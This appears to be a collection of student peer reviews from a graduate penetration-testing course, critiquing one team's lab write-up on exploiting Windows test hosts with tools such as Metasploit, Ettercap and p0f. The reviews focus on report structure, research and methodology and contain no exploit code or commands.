Team 4 did a nice job with their abstract in that it detailed what they intended to do in lab 6 and also tied this lab back to previous labs. Their literature review, however, read like a list and summary of the articles and didn’t compare and contrast the literature to the lab activities.
The methods section starts out reiterating what they discussed in their abstract. After that they explain the process they will follow to complete the lab. However, some of this information should have been in their results section. The methods section does a good job of explaining how they plan to perform their testing. Team 4 gave some details about their testing but missed some key details. They used several exploits from Metasploit were tried but which ones? Team 4 failed consistently on many of their attempts but were honest enough to admit that this was due lack of experience. However, the purpose of these labs is to teach us how to perform penetration testing and how to protect systems properly. Hopefully team 4 will use this exercise as a learning experience and be able to apply it in the next lab exercise. Team 4 could have gone into more detail as to why they believe that exploiting the lower layers would make the next layer up more vulnerable.
Team 4 had a great deal of issues. Many being just the time it took to install and use the selected tools. The lack of time should not be an issue. All teams had the same amount of time to perform the lab experiment, and they were able to get the lab experiment done. Team 4 like others, were disappointed that their exploits did not work for some of their environments, but that part of the learning process. Figure out what went wrong, make adjustments and try it again.
The team starts with their abstract explaining what they are going to do in this week’s lab. The abstract also had a couple sentences that repeated what they had already said in the abstract. Next the team goes into the literature review. They again went into separate reviews for each article. The first article did not have any response to how it relates to the lab and any arguments for or against it. Again the second article just gives an overview of what was discussed within the article and no relation to the lab or any discussion about the article. The team continues the other articles in the same fashion. They then go onto the methodology section and explain what is going to occur in the hands on portion of the lab. When reading through the methodologies there were many items that belong in the results section of the lab. Examples would be when the team discusses how long it took for exploiting some of the vulnerabilities. This does not mean the team could not go into detail on what they were attempting to do but many times it felt as a methodology and results section where merged. The next section was the results section. It was almost as if the team members divided the methodologies and result sections and not collaborate and go over the sections to refine them. There was again repetition on gaining the same information that was talked about previously. This makes the lab hard to read and disorganized. The first paragraph of the results section would have made a good start for their conclusions rather than where it was placed. Next the team goes on to discuss the issues they had. Some of the issues they had were the time they had to learn to use the tools to exploit the system. What they did not put in this section that they talked about earlier in the lab was the experience they have with penetration testing. They could have included that within this section and taken it out of the others. They then go on to give there conclusion which went over what happened during the lab overall. They then discuss exploits via the use of “script kiddies” tools. Yes, some of these tools do make it seem simple to exploit a system but there are the tools that actually required knowledge of what the user is going to exploit before running the tool. When a script kiddies runs a tool they are not creating a plan before an attack and running tools to run the tools against any system. This should make the team rethink before using some of the terminology that can be thrown around. Yes there is no elite creation of tools within the environment but it also does not render just a point and click attack by most of the tools used. Also if some of the tools did not work that should have been put into the issues section and explained why they did not work. Was it because of the tool was coded wrong or inexperience with the tools? Overall they did what they needed for the lab, but the write up needs to be more organized.
I found a few noteworthy things concerning team four’s lab write-up. The literature reviews was at the very least quite lengthy. I must admit I find this team’s commitment to results, demonstrated by the time spent on running exploits, to be admirable. Furthermore, I was intrigued by the fact that some local exploits were attempted: an interesting detail (although specifics were lacking; I assume that the ‘at’ system privilege escalation attack was employed). Finally, I agreed with the discussion on the OSI layer compromising, and appreciated the reference to encryption.
It must be admitted that a fair number of problems are present with this teams report, many are somewhat trivial, but more than a few are serious. The literature review, despite its length, is flawed in style, formatting, and content. The review section was painful to read, due to ‘huge’ paragraph groupings. Furthermore, the use of the phrase “the author” became monotonous to the point of distraction. Continuing, despite the rather lengthy body of writing, almost nothing more than summary information was really presented. Finally, very few references were actually made: the massive paragraph on the first paper made no use of citation, other than to introduce the paper. This team should improve its literature review techniques in the future.
Furthermore, I found it troubling that this team spent so much time in defeating the Windows XP SP0 host. Admittedly, it is worthwhile to experiment with tools, but this length of time appeared to proceed out of difficulty cracking the machine, and not necessarily thoroughness. I would ask: did this team read other teams’ prior lab exercises? I have found other teams’ research nearly as valuable as my own, as it becomes a body of knowledge upon which to draw when designing experimental setups. As it was well reported that certain specific exploits were known to work against XP SP0, the approach this team took of ‘throwing things out until one stuck’ seemed not only a waste of time, but under researched as well. I would suggest that a smart and efficient approach is the definition of professional: leveraging against both your own prior research and that of others in the field is necessary. I would recommend that team four should consider this in the implementation of future methods.
It is also disturbing that this team asserts that they had no real experience with the penetration tools. I ask: what did you do for the last five lab exercises? Some of these prior exercises required testing of exploits; if you did not do these exploit tests, then it seems inappropriate to raise the issue of inexperience as it is self inflicted. Closely related to this, this team did not really use passive methods for the first two hosts, as it is apparent that a type of active scanning was performed which utilized repeated attempts of various exploits. Conceivably, the target will be alerted within the few attempts: this is a far cry from a quick and effective surgical strike based on effective passive reconnaissance. In this, I do not believe this team really fulfilled the goals of the laboratory exercise.
Finally, I found that answers to the laboratory questions were quite brief. While a few good points were raised, no evidence or logic was presented to substantiate these claims. This team asserts that “organizations are more concentrated on securing the upper layers” rather than lower OSI layers. It is most likely a statement which requires explanation, as I am not convinced this is universally true. For instance, in the older UNIX paradigm, I feel there is much evidence to indicate that system administrators concern themselves mainly with the lower network layers rather than user applications. It appears that security policies may vary substantially based on the operating system deployed on the network clients.
I think that group 4’s write-up for lab 6 was fair. The abstract for this lab was adequate and provided a short overview of the lab. The literary review was good and adequately reviewed the material. Group 2 answered all of the required questions for each reading. All of the citing for the literary review was done well and all of the pages were included. For this lab, the group answered all of the required questions and provided a good amount of detail the steps they used to attempt to exploit a system. One part that confused me read as follows: “The group also manually tried various exploits from Metasploit to try and gain access to the Windows XP SP0 operating system. This process took almost all of a day to accomplish.” Almost all of the Windows exploits should work on this system. I find it hard to believe that this task should take longer than 20 minutes, including researching how to use Metasploit and researching an applicable exploit. Also, the group did not explain the passive OS findings well. The indicated that Server 2003 came up as Server 2000 SP4, which is not the same OS at all. What would happen if one were to attack a system using an exploit for one OS when it’s really another? Could this raise awareness and potentially ruin all of the passive scanning done? Finally, the conclusion was adequate and summarizes what was covered.
The team starts out with a strong abstract and provides a well written literature review. The team used a combination of tools such as Ezpwn, FastTrack, Ettercap and p0f to attempt to exploit there selected target machines. It seems as if the team had difficulty attempting to identify the specific operating system using certain tools. Often reading the manual that is available in backtrack can help, type man “name of tool” in a shell. It also seems as if Ettercap gave false reading for most of your tests which is similar to other groups’ findings. Was Metasploit Framework updated before the tests were done or did this happen during the test? It seemed it was updated while testing the Windows XP Sp3 machine. Similar to other groups the Windows XP Sp3 system was difficult to exploit, mainly because this machine is up to date with patches. The Windows XP Sp0 seemed to be the easier of the system to exploit, when comparing the result to the other teams. It seems like all teams picked XP Sp0, mainly because there are known exploits for this system which is the reason for service pack releases.
Team four’s offering is generally improved over previous weeks but still could use some work.
The abstract vaguely describes the experiment. Are premade tools the only means for penetration testing? Is lab seven really about the gaining access to the system, or is there more to it? If the pedagogy calls for the labs to build on each other, do you really need to mention it in the abstract?
The literature review gives exhaustive summaries of the articles that make the report painful to read. While the team makes an attempt to relate the articles back to the labs, it is cursory at best. Little if any evaluative content suggests a lack of comprehension, effort, or both.
The group’s methods section contains a good amount of detail, but more specifics would make it easier to repeat. If the literature review is a mandatory section of the assignment, does it need to be mentioned in the methods section? There is data in this section that belongs in findings. Why did it take all day to crack XP SP0? What finally worked? Why didn’t it work with Service pack 3? Why did you attempt random ports with Server 2003? Did you attempt to fingerprint any of the systems first? Why do you think you didn’t succeed?
In your results section, you state that the team has a lack of penetration testing experience. This belongs in the issues section, but do you feel the other groups have an unfair advantage? Your findings give me an accurate picture of what the group was able to achieve, though there is information that really belongs in the methods section. The tools operate the upper layers but is that where they actually attack?
In the group’s issues section you state that a lot of time was eaten up by learning the tools. Shouldn’t you have been doing this all along? You claim a lack of knowledge as a hindrance. This is a graduate level class. You must be adaptable and learn to cover gaps in knowledge on the fly.
The group’s conclusion summarizes the methods, and states that they learned the ways of trial and error. Will the same tools that worked here always work? What about the tools that failed? Is there anything special about this environment that might have affected the outcome?